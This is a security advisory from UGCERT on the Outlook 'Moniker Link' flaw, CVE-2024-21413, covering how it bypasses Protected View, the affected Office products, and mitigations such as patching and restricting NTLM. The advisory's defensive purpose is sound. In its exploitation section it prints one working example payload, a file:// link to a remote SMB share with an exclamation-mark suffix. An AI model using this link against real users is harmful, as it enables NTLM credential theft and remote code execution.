UGCERT has learnt of a critical Microsoft Outlook vulnerability, CVE-2024-21413 and urges operators and the general public to secure their systems against ongoing cyberattacks due to this vulnerability.
The vulnerability, was discovered by Check Point researcher Haifei Li. It stems from improper input validation in certain Outlook versions, allowing attackers to execute remote code by embedding malicious links in emails.
This flaw enables threat actors to bypass Protected View, a security feature designed to open Office files in read-only mode and block harmful content. Instead, malicious Office documents are launched in editing mode, increasing the risk of exploitation.
When Microsoft patched this vulnerability a year ago, it warned that the Preview Pane can serve as an attack vector—meaning users can be compromised simply by previewing a malicious Office document.
How Attackers Exploit the Vulnerability
Dubbed Moniker Link by Check Point, this exploit takes advantage of Outlook’s handling of certain URLs. By embedding links using the file:// protocol and appending an exclamation mark (!) followed by random text to the file extension, attackers can evade built-in Outlook security measures.
Example of a malicious link:
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>
Affected Microsoft products include:
Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019
Successful exploitation can lead to NTLM credential theft and remote code execution, giving attackers full control over affected systems.
How to Protect Your Organization
To mitigate the risk posed by this flaw, organizations should:
✔ Apply Microsoft’s security patches immediately
✔ Monitor network traffic for signs of exploitation
✔ Educate employees on phishing and malicious email threats
✔ Restrict NTLM authentication where possible
With active attacks underway, swift action is essential to prevent further compromises. Stay vigilant, update your systems, and reinforce cybersecurity best practices to safeguard against this evolving threat.